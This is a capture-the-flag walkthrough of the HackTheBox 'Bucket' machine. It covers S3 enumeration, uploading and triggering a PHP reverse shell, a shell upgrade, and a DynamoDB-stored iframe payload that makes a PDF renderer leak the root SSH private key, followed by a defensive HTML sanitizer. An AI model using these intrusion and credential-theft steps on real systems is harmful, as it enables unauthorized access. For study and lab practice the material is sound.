Hackthebox: Bucket Machine Walkthrough – Medium Difficulty

In this post, I would like to share a walkthrough of the Bucket machine.

This machine is rated as Medium difficulty.

Information Gathering

Once the VPN connection is up, we can start information gathering on the machine by running the command nmap -sC -sV <IP Address> -PN

Let’s see what the website interface shows.

Let’s look into the source of the web page.

We become aware of another URL that we can use.

Scanning Process

We can see that the URL is valid. So, let’s run gobuster in order to get

From the output, we notice that there’s a /health/ directory deployed there.

Nothing to see here. After a while, gobuster reports another directory, so let’s check it.

Now we know that the system is using Amazon Web Services, also known as AWS.

Tools used: Installing awscli

We need to install awscli in order to interact with the machine.

We will execute the command sudo apt update && sudo apt install awscli

AWS Configurations

Now we can try to gain access to the machine via a reverse shell.

Before we can get the reverse shell, aws configure needs to be set up first.

We don’t have to key in a real key because this is for the HTB room only.

We can run the command aws dynamodb list-tables --endpoint-url http://s3.bucket.htb

Oh wait! We got an error with the command, and we found out that the command needs to be executed with root privileges.

We want to know which tables are available on the machine, and we found nothing.

We don’t have any use for this information for now, but we will come back here when needed later on.

aws --endpoint-url http://s3.bucket.htb s3 ls

When we execute the command sudo aws --endpoint-url http://s3.bucket.htb s3 ls, we notice that an adserver bucket is listed there.

Let’s check what is stored in that bucket by executing sudo aws --endpoint-url http://s3.bucket.htb s3 ls s3://adserver

Website files such as index.html are stored in the bucket. I have been thinking that maybe we can upload a file into it.

Let’s upload a PHP reverse shell into it.

I have modified the file name, and we are set with the PHP reverse shell.

We have successfully uploaded the shell into the AWS environment.

We have to start a netcat listener in order to get the reverse shell connection back to us.

We will use curl to trigger the shell on the target machine. The command for this is curl http://bucket.htb/<php reverse shell filename> &> /dev/null

As you can see in the screenshot above, we get a simple shell to play with.

Let’s upgrade the shell

To get an upgraded shell, we use the following steps

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'
  2. Ctrl+Z
  3. stty raw -echo; fg
  4. export TERM=xterm

Retrieve User Flag

Once the shell upgrade is complete, we need to find a valid user in order to get the user flag.

We find that roy is a valid user on the system.

Let’s switch from the current user (www-data) to roy by running the command su roy. The password can be found in the configuration that we looked at earlier.

We have successfully logged in as roy once we enter the correct password.

We get the user flag by reading user.txt in the /home/roy directory.

Retrieve Root Flag (Pretty Hard!)

Firstly, we need to check the connections the machine holds so that we can verify which port can be used for our next step.

We notice that port 8000 is listening, so we need to look deeper into the code by running curl http://localhost:8000

We can run a command such as head -n 30 index.php to understand the code.

It does look clean to read, right?

For the next step, we need to execute everything quickly, because the machine cleans everything up (auto-delete) every 30 seconds.

I will post the commands I used so that it will be easier for you guys.

aws dynamodb create-table \
  --table-name alerts \
  --attribute-definitions \
    AttributeName=title,AttributeType=S \
    AttributeName=data,AttributeType=S \
  --key-schema \
    AttributeName=title,KeyType=HASH \
    AttributeName=data,KeyType=RANGE \
  --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 \
  --endpoint-url http://s3.bucket.htb

aws dynamodb put-item \
  --table-name alerts \
  --item '{"title": {"S": "Ransomware"}, "data": {"S": "<html><head></head><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"}}' \
  --return-consumed-capacity TOTAL \
  --endpoint-url http://s3.bucket.htb

curl --data "action=get_alerts" http://localhost:8000/

scp roy@bucket.htb:/var/www/bucket-app/files/result.pdf ./

If you don’t get result.pdf, you were not quick enough.

Please try faster!

For those who received result.pdf, congratulations. Let’s open the PDF file; the SSH id_rsa key is stored inside it.
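The root step works because whatever HTML sits in the data field of the alerts table is rendered straight into result.pdf, so an iframe can pull in a local file. As an added example (not Bucket’s own index.php, which this post does not reproduce), here is a Python sanitizer of the kind that rendering step would need: it strips document-embedding tags, event handlers and non-http(s) resource URLs before the HTML reaches the PDF generator. The tag and attribute lists are my assumptions, not taken from the machine.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Elements that let an HTML-to-PDF renderer pull another document into the output;
# an iframe pointing at a local path is how a key file ends up inside the PDF.
FORBIDDEN = {"iframe", "frame", "object", "embed", "script", "link", "style", "base", "meta"}
URL_ATTRS = {"src", "href", "data", "poster", "background"}
VOID = {"br", "hr", "img", "input", "area", "col", "wbr", "source"}

def safe_url(value):
    """Only absolute http(s) URLs pass; /root/.ssh/id_rsa or file:///... are rejected."""
    p = urlparse((value or "").strip())
    return p.scheme in ("http", "https") and bool(p.netloc)

class AlertSanitizer(HTMLParser):
    """Re-emits one alert's 'data' HTML, dropping unsafe tags and attributes."""
    def __init__(self):
        super().__init__()  # convert_charrefs=True: text arrives decoded, re-escaped below
        self.out, self.dropped, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):  # parser lowercases tag/attribute names
        if tag in FORBIDDEN:
            self.dropped.append(tag)
            self._skip += tag not in VOID  # also drop everything inside the element
            return
        if self._skip:
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on") or (name in URL_ATTRS and not safe_url(value)):
                self.dropped.append(f"{tag}@{name}")
            elif value is None:
                kept.append(f" {name}")
            else:
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in FORBIDDEN:
            self._skip -= 1 if (tag not in VOID and self._skip) else 0
        elif not self._skip and tag not in VOID:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))

def sanitize_alert_html(data):
    """Return (clean_html, dropped_items) for the HTML body of one alert record."""
    s = AlertSanitizer()
    s.feed(data)
    s.close()
    return "".join(s.out), s.dropped
```

Run it over the iframe payload shown above and the iframe is dropped while the surrounding markup survives; the dropped list is what a defender would log and alert on.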

We need to copy and paste the SSH key into a file on our attacker machine. We can then access the machine with root privileges via the SSH service.

As usual, we go to the /root/ directory so that we can retrieve the root flag.

-THE END-

Happy Learning Guys!
